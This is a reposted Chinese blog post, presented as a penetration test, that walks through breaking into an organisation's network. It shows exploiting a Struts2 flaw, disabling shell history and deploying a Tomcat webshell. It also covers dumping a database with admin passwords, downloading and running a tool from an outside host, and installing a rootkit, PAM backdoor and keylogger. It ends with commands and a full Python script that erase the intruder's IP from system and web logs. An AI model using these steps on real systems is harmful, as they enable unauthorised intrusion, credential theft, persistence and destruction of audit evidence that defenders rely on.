一次渗透测试过程--从外网进内网(原创)

最新推荐文章于 2024-05-21 18:15:00 发布
最新推荐文章于 2024-05-21 18:15:00 发布
阅读量1.6k 收藏 3
点赞数
文章标签: python 网络 运维
原文链接:http://www.cnblogs.com/dongchi/p/4687749.html
版权

本文首发习科:地址http://bbs.blackbap.org/thread-7483-1-1.html

最近内网权限掉了,  需要重新找外网的入口进内网,
用凤凰扫描器生成字典扫了一下弱口令,人肉查看了c段上的一些web, 扫了扫端口,发现13这台机器上跑了一个wingsoft的软件, 在乌云上找到了一个漏洞, 用st2 -005 漏洞得到了可以远程执行命令的权限
0x02  进入边界服务器

执行 unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0  
复制代码
使系统不记录我们的操作记录
用默认的工具上不去webshell,看了下web目录, chmod 777 +r /js/  加了可写权限, 依然webshell上不去,  使用wget -O /web/js/help.jsp www.xxx.com/shell.txt  也写入不了文件

执行
locate tomcat-user.xml

cat /mulu/tomcat-user.xml
复制代码

找到密码以后进入tomcat后台,部署war包获取webshell,  进去了以后,部署一句话后门若干, 并修改掉文件创建的时间,开始在webshell 上收集信息,为内网渗透做准备
netstat -tlnp   //查看内网连过来那些端口
复制代码10.19.1.56

10.19.1.66
192.168.1.184

10.19.1.150 

10.22.1.222   

10.22.1.249

[size=14.399999618530273px]10.22.1.249

翻一番配置文件。找数据库在10.48.14.52 网段连接进去把裤子拖出来, 查找管理员的密码, 翻到3个管理员(*陈,刘*,彭*) 记录下他的密码,看了下 python -h

nmap -h  发现环境里有python环境
复制代码
上insightscan.py 去扫描下 然而报错了(然而并没有扫描卵用),上传凤凰扫描器准备增加一点权限, 上传出错, 采用文件下载的方式
wget -O /tmp/xx.zip http://www.baidu.com/xx.zip

unzip /tmp/xx.zip 

chmod 777 ff

./ff --参数
复制代码提示缺少动态连接裤 (tmux: error while loading shared libraries: libevent-1.4.so.2: cannot open shared object file: No such file or directory
)百度了一下

原因一般有两个, 一个是操作系统里确实没有包含该共享库(lib*.so.*文件)或者共享库版本不对, 遇到这种情况那就去网上下载并安装上即可.
另外一个原因就是已经安装了该共享库, 但执行需要调用该共享库的程序的时候, 程序按照默认共享库路径找不到该共享库文件.
参考连接:http://www.jb51.net/article/35383.htm
0x03 权限维持
(1)安装rootkit
安装的应用级的rootkit,基本就是一个加密的nc,配置好端口 root 和密码就可以了
(2)安装pam后门记录root密码
本地是root权限,我们需要本地的root密码,在/etc/shadow解密不了的情况下, 可以安装pam后门或者ssh后门记录root密码
获取pam版本:rpm -qa|grep pam


复制代码
参考:http://www.freebuf.com/articles/system/24104.html
http://www.nxadmin.com/system/1199.html


(3)安装keyloger
https://github.com/dorneanu/ixkeylog/
0x04 日志清理


(1) web日志的清理
awk '!/123.123.123.123|111.111.111.111|phpspy.php/' /var/log/httpd/access_log > temp && mv temp /var/log/httpd/access_log


复制代码touch -amt 200901231532 文件名   这样把时间改回来

当然 也有批量修改时间的小技巧

ls|xargs touch -amt 200901231532   #这句话就可以直接改时间
复制代码

(2)系统日志的清理 
用的是王子牛的python脚本
#!/usr/bin/env python

import os , sys , subprocess

def banner():

        print '''

This is linux log clear script \n

   Welcome to www.90sec.org\n

    Python log.py 127.0.0.1\n

          By:Mr,PriNce'''

try:

        host = sys.argv[1]

        if len(sys.argv) < 1:

                banner

        log = ["/var/log/messages","/var/log/messages.1","/etc/syslog.conf","/var/log/secure","/var/log/message","/var/log/lastlog","/var/log/auth.log","/var/log/vsftpd.log","/var/log/apache2/access.log","/var/log/apache2/error.log","/var/log/apache2/error.log.1","/usr/local/httpd/error.log","/apache/apache/message.log","/var/log/apache2/access_log","/var/log/apache2/error.log","/var/log/apache2/error_log ","/var/log/apache/access.log","/var/log/apache/access_log","/var/log/apache/error.log","/var/log/apache/error_log","/var/www/logs/error_log"," /var/www/logs/error.log"," /var/www/logs/access_log","/var/www/logs/access.log","/usr/local/apache/logs/error_log"," /usr/local/apache/logs/error.log","/usr/local/apache/logs/access_log","usr/local/apache/logs/access.log","/var/log/error_log","/var/log/error.log","/var/log/access_log","/var/log/access.log","/usr/local/apache/logs/error_logerror_log.old","/usr/local/apache/logs/access_logaccess_log.old","/var/log/access.log","/var/log/access_log","/usr/local/apache/logs/error_log","/usr/local/apache/logs/error.log","/usr/local/apache/logs/access.log","/var/log/messages.1","/var/log/messages.2","/var/log/messages.3","/var/log/messages.4","/var/log/secure.1","/var/log/secure.2","/var/log/secure.3","/var/log/secure.3","/var/log/secure.4"]

        for line in log:

                if os.path.exists(line):

                        subprocess.call("sed -i '/%s/d' %s" % (host , line),shell=True)

                        print "[+]: %s " % (line)

                else:

                        print "[-]: %s " % (line)

except Exception:

        banner()


复制代码

来习科这么久了 , 也为习科写篇文章,未完待续, 内网有2个域,现在还在第一个域徘徊,还没拿到域控权限, 未完待续把。。。

 

转载于:https://www.cnblogs.com/dongchi/p/4687749.html

weixin_30569001
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
到内渗透姿势分享
abc380620175的博客
06-03 1850
现在这段时间是全员 hw 时期,刚好前几天也有幸参与了某个地方的 hw 行动,作为攻击方,这里就简单总结一下最近挖洞的思路吧。因为可能怕涉及到敏感的东西,这里就有的地方不会细说了。 因为本人比较菜,所以只能做一点比较基础的总结,大佬们请忽略吧... 渗透的大体过程 整个渗透测试的流程就是通过信息收,集到的 web 漏洞挖掘,来获取一个 webshell ,通过这个 shell ...
渗透测试 _ 内信息收集1
08-03
收集本机信息是信息收集的第一步,无论在还是内,都至关重要。一旦控制了一台机器,需要获取的信息包括: - **系统和权限**:操作系统版本、权限级别等。 - **内配置**:IP地址段、络配置、是否在域内。 ...
黑客穿透ADSL路由入侵内
网络专栏
06-10 621
也许看烂了上已有的常规黑客攻击手段,对一些陈旧的入侵手法早已厌烦,近来我对ADSL MODEM的路由功能产生了浓厚的兴趣,经过一番努力,我终于找到了穿透ADSL路由入侵内的方法,在这里和各位一起分享我的心得。一.扫描现在很多ADSL MODEM都是通过80、23、21三个端口来管理,但80、21端口有很多服务器都有打开,没什么特征性,于是我选择了23端口。打开我的至爱:SUPPERSC
渗透测试之内渗透学习
最新发布
qingkahui24689的博客
05-21 713
以上便是我学习的简单地从获取shell,经过提权或不提权直接行内渗透的一个简单过程,其中涉及一些概念问题没有说的很明白,希望表哥们提点提点。以上仅为个人学习过程,可能知识点过于简单,望理解。
工控攻防演示-从到内设备的入侵
曲终人散
08-06 2565
· 一、 概述 1. 实验目的 通过工控靶场学习web渗透、内渗透、工控安全相关知识技能。 2. 靶场信息 本实验通过vmware 搭建了靶场的和内环境,在内环境中,可以连接到真实的PLC行漏洞利用。 靶场络拓扑如下: 该络环境中,有两台攻击机处于模拟中,分别是一台 windows7 主机和 kali 主机,通过这两台主机行漏洞利用,获取内访问权限,一步获取西门子PLC的控制权,从而控制城市沙盘。 二、 演示过程 1. 资产发现 登录 kali 攻击机,输入 ifconfig 查
不可能!我的内服务器怎么会被黑客入侵?
我爱娃哈哈的专栏
11-28 6178
文章目录背景一、解决办法1、查看max_allowed_packet设置2、设置方式二、揪出内鬼1、查日志(打开genearl_log)2、结论三、疑问1、MySQL是部署内的,怎么访问?2、黑客是怎么知道用户名和密码的?3、防火墙怎么没防住?4、黑客是怎么发现漏洞的?5、黑客为什么要修改max_allowed_packet参数呢?四、防护措施1. 开启防火墙2. 用户名设置3.密码设置4. 权限设置五、总结 背景 最近,公司内的一台centOS机器,上面安装了MySQL数据库,Redis等软件,
如何检测出内_百度APP移动端络深度优化实践分享(三):移动端弱优化篇...
weixin_39591916的博客
11-27 628
本文由百度技术团队“蔡锐”原创发表于“百度App技术”公众号,原题为《百度App络深度优化系列《三》弱优化》,感谢原作者的无私分享。一、前言络优化解决的核心问题有三个,第一是安全问题,我们在《百度APP移动端络深度优化实践分享(一):DNS优化篇》行了详细的讲解。第二是速度问题,我们在《百度APP移动端络深度优化实践分享(二):络连接优化篇》也做了详细的介绍。第三是弱问题,它是络...
信息系统渗透测试方案.pdf
03-28
2. **攻击路径**:包括内以及不同段/VLAN间的渗透测试,确保全面覆盖。 3. **实施流程**:从方案制定、客户同意、信息收集到权限获取、权限提升、报告生成,每个步骤都应严谨执行。 4. **风险规避**:合理...
渗透测试的实施流程:明确目标、信息收集、漏洞发现、漏洞验证、后渗透测试
08-19
在这个阶段,渗透测试小组根据上一步发现的有可能成功利用的全部漏洞都验证一遍,结合实际情况,搭建模拟环境行试验,成功后应用于目标系统中。漏洞验证方法包括自动化漏洞扫描工具结果验证、手工验证、根据公开...
渗透测试流程
07-12
在整个渗透测试过程中,关键在于全面性、深度和及时性。测试人员需要熟悉各种安全工具,理解不同类型的漏洞和其潜在危害,同时具备良好的沟通能力,以便与银行的IT团队协作,共同保障银系统的安全性。此,...
渗透文档过程有截图
07-02
3. 卡配置:配置卡,一个连接内,一个连接,选择桥接模式,并获取 MAC 地址。 4. 防火墙设置:设置防火墙,KALI 端防火墙设为 192.168.101.1,被渗透端设为 192.168.102.1,并输入掩码长度 24,选择开启 ...
Wingsoft-pc-optimizer:Wingsoft PC Optimizer 清除垃圾文件、清除注册表错误并优化内存以加快计算机速度
06-25
Wingsoft-pc-优化器 Wingsoft PC Optimizer 清除垃圾文件、清除注册表错误并优化内存以加快计算机速度
渗透之常见命令
03-14
渗透之常见命令,详细列数了渗透过程中所用到的所有技术,命令
渗透
weixin_46928280的博客
08-24 849
web渗透的一般流程,以及常见工具的使用,以及简单提权方式
渗透技术的过程
qq_38950485的博客
07-13 2043
环境:linux     这里先不写怎么入这个局域。假设已经在这个局域内了。    基本原理:arp欺骗
渗透测试笔记总结(六)——内服务器端渗透
Leon~博客
02-26 797
目录 一、内存攻防技术 1、缓冲区溢出 二、络服务攻击 1、windows自身的络服务攻击 2、微软络服务攻击 3、第三方络服务攻击 4、工业控制系统服务攻击 三、络服务攻击实例——ms08-067 1、攻击原理 2、使用metasploit攻击 四、第三方络服务攻击实例——oracle数据库...
个人承接各种漏洞扫描,各种渗透测试
weixin_46081038的博客
07-14 357
个人安全漏洞扫描服务,专业渗透测试服务。
渗透测试——BlackMarket
D-R0s1的博客
11-16 2688
第一步:主机发现(找到渗透靶机的ip,使用工具为netdiscover,nmap) 在kali中使用命令安装netdiscover:apt install netdiscover 命令:netdiscover 默认扫描局域内所有机器,这样的话扫描的是B类地址,所以时间会比较慢。我们也可以直接使用 命令:netdiscover -i eth0 -r 192.168.1.1/24 -i是...
渗透测试常用方法总结
qq_53058639的博客
03-10 1336
Hadoop=HDFS(文件系统,数据存储技术相关)+ Mapreduce(数据处理),Hadoop的数据来源可以是任何形式,在处理半结构化和非结构化数据上与关系型数据库相比有更好的性能,具有更灵活的处理能力,不管任何数据形式最终会转化为key/value,key/value是基本数据单元。一般组织中很多独立安装的 Esxi 形式的私有云,或独立部署的虚拟化系统。没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值